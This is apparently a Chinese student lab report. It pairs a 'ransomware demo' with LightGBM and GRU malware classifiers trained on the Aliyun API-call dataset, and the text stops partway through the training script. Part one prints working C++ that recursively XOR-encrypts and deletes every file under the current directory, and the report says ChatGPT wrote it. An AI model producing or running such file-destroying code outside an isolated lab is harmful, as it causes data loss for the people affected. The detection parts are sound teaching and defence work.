实验报告:基于勒索病毒、机器学习和深度学习的恶意程序检测研究

实验报告:基于勒索病毒、机器学习和深度学习的恶意程序检测研究

实验背景

随着信息技术的迅猛发展,计算机病毒的种类和数量不断增加,给信息安全带来了严峻挑战。传统的病毒检测方法主要依赖特征码和启发式分析,但在应对新型和变种病毒时效果有限。机器学习和深度学习作为现代人工智能的重要分支,提供了新的解决方案。恶意程序是网络安全的重要威胁,其中勒索病毒尤为严重,通过加密受害者文件索取赎金。本实验分三个部分:

  1. 设计一个简单的勒索病毒Demo,了解恶意程序的基本行为。
  2. 利用机器学习方法检测恶意程序。
  3. 利用深度学习方法检测并分类恶意程序。

第一部分:勒索病毒Demo设计

实验目的

利用ChatGPT实现一个勒索病毒的简化模型,模拟文件加密与解密流程,探究恶意程序的行为特征。

技术实现
  1. 加密功能:
    • 遍历当前目录及子目录中的所有文件。
    • 使用简单的异或加密算法(XOR)加密文件内容,并将加密后的文件扩展名改为.exe
    • 删除原始文件,保留加密后的文件。
  2. 解密功能:
    • 遍历加密文件,使用相同的XOR解密逻辑还原原始文件。
    • 删除加密文件,恢复文件原始状态。
代码逻辑
  • 文件遍历:使用Windows API递归遍历文件夹。
  • 文件操作:基于FILE*文件指针读写文件。
安全注意事项
  • 仅供学习使用,禁止用于任何非法目的。
  • 所有操作应限制在“测试文件夹”中,避免误操作导致数据丢失。

    encode-main.cpp

1
2
3
4
5
6
7
8
9
10
11
12
13
#include<stdio.h>
#include<windows.h>
#include"funcs.h"


int main() {
char buff[MAX_PATH];
GetCurrentDirectory(MAX_PATH, buff);
findFile(buff);
printf("Oh, ho, you got it\n");
system("pause");
return 0;
}

encode-funcs.cpp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
#include"funcs.h"
#include<stdio.h>
#include<windows.h>

void findFile(char* pathName) {
char currFile[MAX_PATH]; // 暂时存储每个文件名
memset(currFile, 0, MAX_PATH);
sprintf(currFile, "%s\\*.*", pathName);
_WIN32_FIND_DATAA findData;
HANDLE hFile = FindFirstFile(currFile, &findData);
if (hFile == INVALID_HANDLE_VALUE)
return;

int ret = 0;
while (1) {
memset(currFile, 0, MAX_PATH);
sprintf(currFile, "%s\\%s", pathName, findData.cFileName);
// 检查文件属性--文件还是文件夹?
if (findData.cFileName[0] == '.'); //对特殊文件夹不进行处理
else if ((findData.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY)) //如果是普通文件夹,递归调用findFile函数
findFile(currFile);
else //否则,处理当前文件
enCode(currFile);

ret = FindNextFile(hFile, &findData);
if (!ret)
break;
}
}

void enCode(char* pathFile) {
//打开待加密文件,创建加密后文件
FILE* fpSrc = fopen(pathFile, "rb"); //只读字节流
char buff[MAX_PATH];
sprintf(buff, "%s.exe", pathFile);
FILE* fpDst = fopen(buff, "wb"); //只写字节流

if (fpSrc == NULL || fpDst == NULL)
return;
//以单个字节循环读取待加密文件内容,并写入加密文件中
char currByte;
while (1) {
int count = fread(&currByte, 1, 1, fpSrc);
if (count < 1) //没读到
break;
currByte ^= 0x66; //简单异或加密法
fwrite(&currByte, 1, 1, fpDst); //写入加密文件
}
fclose(fpSrc);
fclose(fpDst);
remove(pathFile); //删除原文件
}

encode-funcs.h

1
2
3
4
5
6
7
8
#pragma once
#pragma warning(disable : 4996)

// 在指定路径下递归寻找所有文件
void findFile(char* pathName);

// 加密操作
void enCode(char* pathFile);

decode-main.cpp

1
2
3
4
5
6
7
8
9
10
11
12
13
#include<stdio.h>
#include<windows.h>
#include"funcs.h"


int main() {
char buff[MAX_PATH];
GetCurrentDirectory(MAX_PATH, buff);
findFile(buff);
printf("Oh, ho, all file recovered!\n");
system("pause");
return 0;
}

decode-funcs.cpp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
#include"funcs.h"
#include<stdio.h>
#include<windows.h>

void findFile(char* pathName) {
char currFile[MAX_PATH]; // 暂时存储每个文件名
memset(currFile, 0, MAX_PATH);
sprintf(currFile, "%s\\*.*", pathName);
_WIN32_FIND_DATAA findData;
HANDLE hFile = FindFirstFile(currFile, &findData);
if (hFile == INVALID_HANDLE_VALUE)
return;

int ret = 0;
while (1) {
memset(currFile, 0, MAX_PATH);
sprintf(currFile, "%s\\%s", pathName, findData.cFileName);
// 检查文件属性--文件还是文件夹?
if (findData.cFileName[0] == '.'); //对特殊文件夹不进行处理
else if ((findData.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY)) //如果是普通文件夹,递归调用findFile函数
findFile(currFile);
else //否则,处理当前文件(安全起见这里仅打印文件名)
deCode(currFile);

ret = FindNextFile(hFile, &findData);
if (!ret)
break;
}
}

void deCode(char* pathFile) {
//打开待解密文件,创建解密后文件
FILE* fpSrc = fopen(pathFile, "rb"); //只读字节流
char buff[MAX_PATH];
memset(buff, 0, MAX_PATH);
//去掉.exe后缀
if (dropEXE(pathFile, buff) != 0) //如果返回非0,则说明当前文件非.exe结尾,不进行解密处理
return;
FILE* fpDst = fopen(buff, "wb"); //只写字节流
if (fpSrc == NULL || fpDst == NULL)
return;
//以单个字节循环读取待解密文件内容,并写入解密文件中
char currByte;
while (1) {
int count = fread(&currByte, 1, 1, fpSrc);
if (count < 1) //没读到
break;
currByte ^= 0x66; //简单异或解密法
fwrite(&currByte, 1, 1, fpDst); //写入解密文件
}
fclose(fpSrc);
fclose(fpDst);
printf("Congrat! %s recoveried successfully!\n", buff);
remove(pathFile);
}

int dropEXE(char* fpSrc, char* fpDst) {
int n = strlen(fpSrc);
if (n < 4)
return 1;
char check[5];
for (int i = 0; i < 4; ++i)
check[i] = *(fpSrc + n - 4 + i);
check[4] = '\0';
if (strcmp(check, ".exe") != 0) {
printf("sorry, %s is not a .exe file, recovery failed!\n", fpSrc);
return 1;
}
strncpy(fpDst, fpSrc, n - 4);
return 0;
}

decode-funcs.h

1
2
3
4
5
6
7
8
9
#pragma once
#pragma warning(disable : 4996)

// 在指定路径下递归寻找所有文件
void findFile(char* pathName);

// 解密操作
void deCode(char* pathFile);
int dropEXE(char* fpSrc, char* fpDst);

第二部分:基于机器学习的恶意程序检测

恶意软件是一种被设计用来对目标计算机造成破坏或占用目标计算机资源的软件,包括蠕虫、木马、勒索病毒等。近年来,随着虚拟货币的流行,挖矿类恶意程序也大规模出现,严重侵害用户利益。通过结合机器学习和深度学习技术,能够有效提高恶意程序的检测率和泛化能力。

本实验以阿里云安全恶意程序检测竞赛提供的恶意程序检测数据集为基础,探索恶意程序检测的多种方法,包括:

  1. 模拟勒索病毒行为。
  2. 基于机器学习的恶意程序检测。
  3. 基于深度学习的恶意程序分类。
数据集介绍:

阿里云安全恶意程序检测数据集 (阿里云数据集)

本次实验使用的数据集由阿里云提供,包含从沙箱模拟运行后的Windows可执行程序API调用序列。数据总计约6亿条,包括多种恶意程序类型和正常文件的数据。数据集主要特点和内容如下:

1. 数据结构
字段名称 数据类型 解释
file_id bigint 文件编号
label bigint 文件标签:0(正常)、1(勒索病毒)、2(挖矿程序)、3(DDoS木马)、4(蠕虫病毒)、5(感染型病毒)、6(后门程序)、7(木马程序)
api string 文件调用的API名称
tid bigint 调用API的线程编号
return_value string API返回值
index string API调用的顺序编号,在同线程中保证顺序,但不同线程之间无顺序关系
2. 数据规模
  • 训练数据:约9000万次调用,文件1万多个(以文件编号汇总)。
  • 测试数据:约8000万次调用,包含约1万个文件。
  • 每个文件中的API调用可能超过5000条,超出部分已截断。
3. 数据预处理
  • 数据均已脱敏,确保隐私和安全。
  • 每条记录包含完整的调用上下文及线程信息,有助于模型捕获程序行为特征。
4. 评测指标

使用LogLoss(对数损失)作为评测指标:

$\text{logloss} = -\frac{1}{N} \sum{i=1}^N \sum{j=1}^M \left[ y{ij} \log(P{ij}) + (1 - y{ij}) \log(1 - P{ij}) \right]$

其中:

  • $M$:表示分类数(总共6个类别)。
  • $N$:表示测试集样本总数。
  • $y_{ij}$:第$i$个样本是否属于第$j$类(是-1,否-0)。
  • $P_{ij}$:第$i$个样本被预测为第$j$类的概率(如:prob0, prob1, prob2, prob3, prob4, prob5 ,prob6,prob7)。
实验方法
  1. 特征提取:
    • 将恶意软件的数据格式化,主要包括API调用序列、线程信息等。
    • 统一数据的API字段编码,使用LabelEncoder为API字段生成整数值,便于模型处理。
    • 对API调用序列长度进行填充/截断(最大长度设为5000)。
    • 基于TF-IDF对API调用文本进行特征提取。
  2. 模型训练:
    • 使用TF-IDF提取特征,结合LightGBM分类模型。
    • TF-IDF使用一元和二元词组,特征数量限制为1000。
    • 使用5折交叉验证评估模型性能。
实验结果
  1. 代码实现:
    • 特征提取:基于TF-IDF的API序列向量化。
    • 模型训练:使用LightGBM进行多分类任务。
  2. 性能表现:
    • 平均验证集准确率:90.24%
    • 每折交叉验证的准确率分布:
      • 折1:90.82%
      • 折2:89.67%
      • 折3:90.49%
      • 折4:89.41%
      • 折5:90.78%
  3. 特征贡献:
    • TF-IDF特征对模型贡献显著,尤其是高频API组合。线程相关统计特征如调用次数、API分布等也显著提升了分类效果。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
PS D:\chen_hao\病毒检测机器学习> & D:/ProgramSoftware/anaconda3/python.exe d:/chen_hao/病毒检测机器学习/TF-IDF_LightGBM.py
检查GPU状态...
GPU 检查失败,将使用 CPU 模式: module 'lightgbm' has no attribute 'get_gpu_device_count'
读取训练数据...
读取测试数据...
训练数据形状: (89806693, 5)
测试数据形状: (79288375, 4)
准备训练数据...
编码标签...
原始标签分布:
label
5 33033543
0 16375107
7 15081535
2 9693969
3 8117585
6 4586578
1 2254561
4 663815
Name: count, dtype: int64
标签映射:
{0: 0, 1: 1, 2: 2, 3: 3, 4: 4, 5: 5, 6: 6, 7: 7}
提取基础统计特征...
计算基础聚合特征...
计算API序列特征...
计算线程特征...
提取TF-IDF特征...
准备API序列...
训练TF-IDF向量化器...
开始5折交叉验证训练...

训练折数 1/5
Training until validation scores don't improve for 50 rounds
[100] valid_0's multi_logloss: 0.267747
Early stopping, best iteration is:
[103] valid_0's multi_logloss: 0.267092
Fold 1 验证集准确率: 0.9082

训练折数 2/5
Training until validation scores don't improve for 50 rounds
[100] valid_0's multi_logloss: 0.315787
Early stopping, best iteration is:
[93] valid_0's multi_logloss: 0.314403
Fold 2 验证集准确率: 0.8967

训练折数 3/5
Training until validation scores don't improve for 50 rounds
[100] valid_0's multi_logloss: 0.299846
Early stopping, best iteration is:
[88] valid_0's multi_logloss: 0.298147
Fold 3 验证集准确率: 0.9049

训练折数 4/5
Training until validation scores don't improve for 50 rounds
[100] valid_0's multi_logloss: 0.331149
Early stopping, best iteration is:
[83] valid_0's multi_logloss: 0.328906
Fold 4 验证集准确率: 0.8941

训练折数 5/5
Training until validation scores don't improve for 50 rounds
[100] valid_0's multi_logloss: 0.292818
Early stopping, best iteration is:
[95] valid_0's multi_logloss: 0.291777
Fold 5 验证集准确率: 0.9078

平均验证集准确率: 0.9024
生成预测结果...
准备测试数据...
编码标签...
提取基础统计特征...
计算基础聚合特征...
计算API序列特征...
计算线程特征...
提取TF-IDF特征...
准备API序列...
生成预测...
保存预测结果...
完成!
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
import numpy as np
import pandas as pd
from sklearn.metrics import accuracy_score
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.model_selection import train_test_split, StratifiedKFold
import lightgbm as lgb
import warnings

warnings.filterwarnings('ignore')


def check_gpu():
"""检查GPU是否可用"""
try:
lgb_version = lgb.__version__
is_gpu_available = lgb.get_gpu_device_count() > 0
print(f"LightGBM 版本: {lgb_version}")
print(f"GPU 可用: {is_gpu_available}")
if is_gpu_available:
print(f"可用 GPU 数量: {lgb.get_gpu_device_count()}")
except Exception as e:
print(f"GPU 检查失败,将使用 CPU 模式: {e}")
return False
return is_gpu_available


def optimize_dtypes(df):
"""优化数据类型以减少内存使用"""
for col in df.columns:
if df[col].dtype == 'float64':
df[col] = df[col].astype('float32')
elif df[col].dtype == 'int64':
df[col] = df[col].astype('int32')
return df


class MalwareClassifier:
def __init__(self, use_gpu=True):
self.tfidf = None
self.models = None
self.feature_importances = None
self.use_gpu = use_gpu
self.label_map = None

def _encode_labels(self, train_data=None, test_data=None):
"""标签编码"""
if train_data is not None and 'label' in train_data.columns:
print("原始标签分布:")
print(train_data['label'].value_counts())
unique_labels = sorted(train_data['label'].unique())
self.label_map = {label: idx for idx, label in enumerate(unique_labels)}
print("标签映射:")
print(self.label_map)
train_data['label'] = train_data['label'].map(self.label_map)

if test_data is not None and 'label' in test_data.columns:
test_data['label'] = test_data['label'].map(self.label_map)

return train_data, test_data

def prepare_features(self, train_data=None, test_data=None):
"""准备所有特征"""
print("编码标签...")
train_data, test_data = self._encode_labels(train_data, test_data)

if train_data is not None:
print("提取基础统计特征...")
train_stats = self._extract_basic_stats(train_data)
print("提取TF-IDF特征...")
if test_data is not None:
train_tfidf, test_tfidf = self._extract_tfidf_features(train_data, test_data)
test_stats = self._extract_basic_stats(test_data)
train_features = pd.merge(train_stats, train_tfidf, on='file_id')
test_features = pd.merge(test_stats, test_tfidf, on='file_id')
return train_features, test_features
else:
train_tfidf = self._extract_tfidf_features(train_data)
return pd.merge(train_stats, train_tfidf, on='file_id')
elif test_data is not None:
print("提取基础统计特征...")
test_stats = self._extract_basic_stats(test_data)
print("提取TF-IDF特征...")
test_tfidf = self._extract_tfidf_features(test_data)
return pd.merge(test_stats, test_tfidf, on='file_id')

def _extract_basic_stats(self, data):
"""提取基础统计特征"""
if 'label' in data.columns:
df = data.groupby('file_id')['label'].first().reset_index()
else:
df = pd.DataFrame({'file_id': data['file_id'].unique()})

print("计算基础聚合特征...")
agg_features = data.groupby('file_id').agg({
'api': ['count', 'nunique'],
'tid': 'nunique',
'index': ['min', 'max', 'mean', 'std']
}).reset_index()
agg_features.columns = ['file_id', 'api_calls', 'unique_apis',
'thread_count', 'min_index', 'max_index',
'mean_index', 'std_index']

df = pd.merge(df, agg_features, on='file_id', how='left')

print("计算API序列特征...")
api_counts = data.groupby(['file_id', 'api']).size().reset_index(name='api_freq')
top_apis = api_counts.groupby('file_id')['api_freq'].agg(['max', 'mean']).reset_index()
top_apis.columns = ['file_id', 'max_api_freq', 'mean_api_freq']

df = pd.merge(df, top_apis, on='file_id', how='left')

print("计算线程特征...")
thread_stats = data.groupby(['file_id', 'tid']).size().reset_index(name='apis_per_thread')
thread_agg = thread_stats.groupby('file_id')['apis_per_thread'].agg(['mean', 'std', 'max']).reset_index()
thread_agg.columns = ['file_id', 'mean_apis_per_thread', 'std_apis_per_thread', 'max_apis_per_thread']

df = pd.merge(df, thread_agg, on='file_id', how='left')

df['unique_api_ratio'] = df['unique_apis'] / (df['api_calls'] + 1)
df['api_per_thread_ratio'] = df['api_calls'] / (df['thread_count'] + 1)

df = df.fillna(0)
return df

def _extract_tfidf_features(self, train_data, test_data=None):
def prepare_api_sequence(data):
return data.groupby('file_id').agg({
'api': lambda x: ' '.join(x.astype(str))
}).reset_index().rename(columns={'api': 'api_sequence'})

print("准备API序列...")
train_sequences = prepare_api_sequence(train_data)

if self.tfidf is None:
print("训练TF-IDF向量化器...")
self.tfidf = TfidfVectorizer(
max_features=1000,
ngram_range=(1, 2),
min_df=5,
dtype=np.float32,
token_pattern=r'(?u)\b\w+\b'
)
tfidf_features = self.tfidf.fit_transform(train_sequences['api_sequence'])
else:
tfidf_features = self.tfidf.transform(train_sequences['api_sequence'])

feature_names = [f'tfidf_{i}' for i in range(tfidf_features.shape[1])]
tfidf_df = pd.DataFrame(
tfidf_features.toarray(),
columns=feature_names,
dtype=np.float32
)
tfidf_df['file_id'] = train_sequences['file_id'].values

if test_data is not None:
print("处理测试数据TF-IDF特征...")
test_sequences = prepare_api_sequence(test_data)
test_features = self.tfidf.transform(test_sequences['api_sequence'])
test_tfidf_df = pd.DataFrame(
test_features.toarray(),
columns=feature_names,
dtype=np.float32
)
test_tfidf_df['file_id'] = test_sequences['file_id'].values
return tfidf_df, test_tfidf_df

return tfidf_df

def train(self, train_data, n_folds=5):
print("准备训练数据...")
train_features = self.prepare_features(train_data)

X = train_features.drop(['file_id', 'label'], axis=1)
y = train_features['label']

num_classes = len(y.unique())

params = {
'objective': 'multiclass',
'num_class': num_classes,
'metric': 'multi_logloss',
'boosting_type': 'gbdt',
'num_leaves': 31,
'learning_rate': 0.05,
'feature_fraction': 0.9,
'bagging_fraction': 0.8,
'bagging_freq': 5,
'verbose': -1,
'max_bin': 63,
'min_data_in_leaf': 50,
'num_threads': 8
}

if self.use_gpu:
gpu_params = {
'device': 'gpu',
'gpu_platform_id': 0,
'gpu_device_id': 0,
'device_type': 'cuda',
'tree_learner': 'feature'
}
params.update(gpu_params)

kf = StratifiedKFold(n_splits=n_folds, shuffle=True, random_state=42)
self.models = []
self.feature_importances = pd.DataFrame()
validation_accuracies = []

print(f"开始{n_folds}折交叉验证训练...")
for fold, (train_idx, val_idx) in enumerate(kf.split(X, y), 1):
print(f"\n训练折数 {fold}/{n_folds}")
X_train, X_val = X.iloc[train_idx], X.iloc[val_idx]
y_train, y_val = y.iloc[train_idx], y.iloc[val_idx]

train_data = lgb.Dataset(X_train, y_train)
valid_data = lgb.Dataset(X_val, y_val, reference=train_data)

model = lgb.train(
params,
train_data,
num_boost_round=1000,
valid_sets=[valid_data],
callbacks=[
lgb.early_stopping(50),
lgb.log_evaluation(100)
]
)

self.models.append(model)

fold_importance = pd.DataFrame({
'feature': X.columns,
f'importance_fold_{fold}': model.feature_importance()
})
self.feature_importances = pd.concat([
self.feature_importances,
fold_importance
], axis=1)

val_preds = model.predict(X_val)
val_preds = np.argmax(val_preds, axis=1)
val_accuracy = accuracy_score(y_val, val_preds)
validation_accuracies.append(val_accuracy)
print(f"Fold {fold} 验证集准确率: {val_accuracy:.4f}")

mean_accuracy = np.mean(validation_accuracies)
print(f"\n平均验证集准确率: {mean_accuracy:.4f}")

def predict(self, test_data):
print("准备测试数据...")
test_features = self.prepare_features(test_data=test_data)

print("生成预测...")
X_test = test_features.drop(['file_id'], axis=1)

predictions = np.zeros((len(X_test), len(self.label_map)), dtype=np.float32)
for model in self.models:
predictions += model.predict(X_test)
predictions /= len(self.models)

submission = pd.DataFrame({
'file_id': test_features['file_id']
})

for i, label in enumerate(sorted(self.label_map.keys())):
submission[f'prob_{label}'] = predictions[:, i]

return submission


def load_data_in_chunks(train_path, test_path, chunk_size=1000000):
print("读取训练数据...")
train_chunks = pd.read_csv(train_path, chunksize=chunk_size)
train_data = pd.concat(train_chunks)

print("读取测试数据...")
test_chunks = pd.read_csv(test_path, chunksize=chunk_size)
test_data = pd.concat(test_chunks)

train_data = optimize_dtypes(train_data)
test_data = optimize_dtypes(test_data)

print(f"训练数据形状: {train_data.shape}")
print(f"测试数据形状: {test_data.shape}")

return train_data, test_data


def main():
print("检查GPU状态...")
gpu_available = check_gpu()

try:
train_data, test_data = load_data_in_chunks(
'input/train.csv',
'input/test.csv'
)

classifier = MalwareClassifier(use_gpu=gpu_available)

classifier.train(train_data, n_folds=5)

print("生成预测结果...")
submission = classifier.predict(test_data)

print("保存预测结果...")
submission.to_csv('submission.csv', index=False)

if classifier.feature_importances is not None:
classifier.feature_importances.to_csv('feature_importances.csv', index=False)

print("完成!")

except Exception as e:
print(f"发生错误: {str(e)}")
import traceback
traceback.print_exc()


if __name__ == "__main__":
main()

  1. 结果展示
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
file_id,prob_0,prob_1,prob_2,prob_3,prob_4,prob_5,prob_6,prob_7
1,0.0024434612,0.00034864913,0.9696685,0.0078575,0.00039957318,0.002738173,0.0044820085,0.012062186
2,0.7480677,0.0013819844,0.0049213427,0.003764731,0.0005452622,0.045439627,0.017060611,0.17881876
3,0.99866915,2.787807e-05,0.00014846055,0.00011570427,5.9706535e-06,0.00043032583,6.843034e-05,0.00053410063
4,0.051594943,0.0038525928,0.035013992,0.065091416,0.0038617428,0.044863444,0.22614911,0.5695728
5,0.9948373,0.00013502031,0.0009673423,0.0006626427,2.3118486e-05,0.0015179071,0.00018578261,0.0016709866
6,0.002266401,0.00025418383,0.006541302,0.0007698187,3.052294e-05,0.98704815,0.00070866174,0.0023810265
7,0.0043757814,0.00055977836,0.0015399179,0.70781934,0.002132857,0.025764057,0.0015818799,0.2562264
8,0.93392134,0.0009572902,0.0076661445,0.0061014136,0.00012724655,0.016519673,0.003812942,0.030893898
9,0.85189515,0.0010084683,0.0036384996,0.0051778518,0.00022519422,0.07421501,0.014758055,0.04908181
10,0.37684268,0.006323976,0.20794848,0.0114947595,0.00050486217,0.12723994,0.03782148,0.23182385
11,0.0064604813,0.0006989088,0.0032121348,0.0008223769,5.8260433e-05,0.9772016,0.0031507823,0.008395462
12,0.9656893,0.0048273774,0.009747942,0.001571597,4.1226842e-05,0.0074556046,0.000666464,0.010000597
13,0.9976041,5.375104e-05,0.00030956598,0.00024548933,1.8375762e-05,0.0011245721,9.734804e-05,0.00054680154
14,0.9703827,0.00031270864,0.01056415,0.008323639,0.00010526275,0.0041897697,0.00083469774,0.0052871224
15,0.9724293,0.0001765955,0.020143056,0.0005281937,5.2647345e-05,0.0018647272,0.00078569603,0.004019852
16,0.99562645,7.9901416e-05,0.00037493333,0.00046305108,1.6109376e-05,0.0015119539,0.00081107346,0.0011165042
17,0.001069112,0.00026497667,0.004910701,0.0060763317,0.00013840488,0.96927947,0.0017614173,0.016499612
18,0.986684,0.00047525796,0.0021059073,0.0008186839,3.3282307e-05,0.004973329,0.0010258693,0.0038835872
19,0.9890321,0.00015959739,0.002707534,0.0009250467,5.465704e-05,0.0030247762,0.00037867084,0.0037176465
.png) #### 第三部分:基于深度学习的恶意程序检测与分类 ##### **实验方法** 1. 特征: - 使用API调用序列直接作为输入。 2. 模型结构: - 基于双向GRU的深度学习模型。 - 嵌入层将API序列转换为向量,双向GRU捕获序列时序信息,全连接层输出分类结果。 3. 训练与验证: - 使用交叉熵损失函数,Adam优化器。 - 保存验证集损失最小的模型。 ##### **实验结果** 1. 代码实现: - 使用PyTorch实现深度学习模型。 2. 性能表现: - 最终验证集准确率达到**83.66%**。 - 模型在20个epoch中逐步收敛,训练准确率从初始的42.72%提升至84.67%。 - 验证集损失显著降低,证明模型具有良好的泛化能力。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
import os
import numpy as np
import pandas as pd
import torch
import torch.nn as nn
import torch.optim as optim
from torch.utils.data import DataLoader, Dataset
from sklearn.preprocessing import LabelEncoder
from sklearn.model_selection import train_test_split
from tqdm import tqdm

# 设置随机种子和设备
SEED = 42
np.random.seed(SEED)
torch.manual_seed(SEED)
DEVICE = torch.device("cuda" if torch.cuda.is_available() else "cpu")
print(f"Using device: {DEVICE}")

# 加载数据
train_data = pd.read_csv('input/train.csv')
test_data = pd.read_csv('input/test.csv')

# 编码API
apis = list(set(list(train_data.api.unique()) + list(test_data.api.unique())))
enc = LabelEncoder().fit(apis)
train_data['enc'] = enc.transform(train_data.api)
test_data['enc'] = enc.transform(test_data.api)

# 聚合每个文件的API序列
tr = train_data.groupby('file_id').enc.apply(list).reset_index()
te = test_data.groupby('file_id').enc.apply(list).reset_index()

# 提取标签
label = train_data.groupby('file_id')['label'].agg('first').reset_index()
num_classes = label.label.nunique()
label_encoder = LabelEncoder()
label['label'] = label_encoder.fit_transform(label['label'])

# 填充序列
MAX_SEQ_LEN = 5000
tr['enc'] = tr['enc'].apply(lambda x: x[:MAX_SEQ_LEN] if len(x) > MAX_SEQ_LEN else x + [0] * (MAX_SEQ_LEN - len(x)))
te['enc'] = te['enc'].apply(lambda x: x[:MAX_SEQ_LEN] if len(x) > MAX_SEQ_LEN else x + [0] * (MAX_SEQ_LEN - len(x)))

# 转换为 PyTorch Dataset
class VirusDataset(Dataset):
def __init__(self, sequences, labels=None):
self.sequences = torch.tensor(sequences, dtype=torch.long)
self.labels = torch.tensor(labels, dtype=torch.long) if labels is not None else None

def __len__(self):
return len(self.sequences)

def __getitem__(self, idx):
if self.labels is not None:
return self.sequences[idx], self.labels[idx]
else:
return self.sequences[idx]

# 创建数据集
X_train, X_val, y_train, y_val = train_test_split(tr['enc'].tolist(), label['label'].tolist(), test_size=0.2, random_state=SEED)
train_dataset = VirusDataset(X_train, y_train)
val_dataset = VirusDataset(X_val, y_val)
test_dataset = VirusDataset(te['enc'].tolist())

# 数据加载器
BATCH_SIZE = 256
train_loader = DataLoader(train_dataset, batch_size=BATCH_SIZE, shuffle=True)
val_loader = DataLoader(val_dataset, batch_size=BATCH_SIZE, shuffle=False)
test_loader = DataLoader(test_dataset, batch_size=BATCH_SIZE, shuffle=False)

# 模型定义
class GRUModel(nn.Module):
def __init__(self, vocab_size, embed_dim, hidden_dim, num_classes):
super(GRUModel, self).__init__()
self.embedding = nn.Embedding(vocab_size, embed_dim, padding_idx=0)
self.gru = nn.GRU(embed_dim, hidden_dim, batch_first=True, bidirectional=True)
self.fc = nn.Linear(hidden_dim * 2, num_classes)
self.dropout = nn.Dropout(0.3)

def forward(self, x):
x = self.embedding(x) # x shape: (batch_size, seq_len, embed_dim)
x, _ = self.gru(x) # x shape: (batch_size, seq_len, hidden_dim * 2)
x = x[:, -1, :] # 取最后一个时间步的输出 (batch_size, hidden_dim * 2)
x = self.dropout(x)
x = self.fc(x) # x shape: (batch_size, num_classes)
return x

# 超参数
VOCAB_SIZE = len(apis) + 1
EMBED_DIM = 50
HIDDEN_DIM = 128
NUM_CLASSES = num_classes
LR = 0.001
EPOCHS = 20

# 初始化模型、损失函数和优化器
model = GRUModel(VOCAB_SIZE, EMBED_DIM, HIDDEN_DIM, NUM_CLASSES).to(DEVICE)
criterion = nn.CrossEntropyLoss()
optimizer = optim.Adam(model.parameters(), lr=LR)

# 检查是否存在模型文件
MODEL_PATH = 'best_gru_model.pth'
if os.path.exists(MODEL_PATH):
print(f"检测到已有模型文件 {MODEL_PATH},直接加载模型进行预测...")
model.load_state_dict(torch.load(MODEL_PATH))
else:
# 训练和验证函数
def train_epoch(model, dataloader, criterion, optimizer):
model.train()
epoch_loss, correct, total = 0, 0, 0
for sequences, labels in tqdm(dataloader, desc="Training"):
sequences, labels = sequences.to(DEVICE), labels.to(DEVICE)
optimizer.zero_grad()
outputs = model(sequences)
loss = criterion(outputs, labels)
loss.backward()
optimizer.step()
epoch_loss += loss.item() * sequences.size(0)
preds = outputs.argmax(dim=1)
correct += (preds == labels).sum().item()
total += labels.size(0)
return epoch_loss / total, correct / total

def validate_epoch(model, dataloader, criterion):
model.eval()
epoch_loss, correct, total = 0, 0, 0
with torch.no_grad():
for sequences, labels in tqdm(dataloader, desc="Validation"):
sequences, labels = sequences.to(DEVICE), labels.to(DEVICE)
outputs = model(sequences)
loss = criterion(outputs, labels)
epoch_loss += loss.item() * sequences.size(0)
preds = outputs.argmax(dim=1)
correct += (preds == labels).sum().item()
total += labels.size(0)
return epoch_loss / total, correct / total

# 开始训练模型
best_val_loss = float('inf')
for epoch in range(EPOCHS):
print(f"\nEpoch {epoch + 1}/{EPOCHS}")
train_loss, train_acc = train_epoch(model, train_loader, criterion, optimizer)
val_loss, val_acc = validate_epoch(model, val_loader, criterion)
print(f"Train Loss: {train_loss:.4f}, Train Accuracy: {train_acc:.4f}")
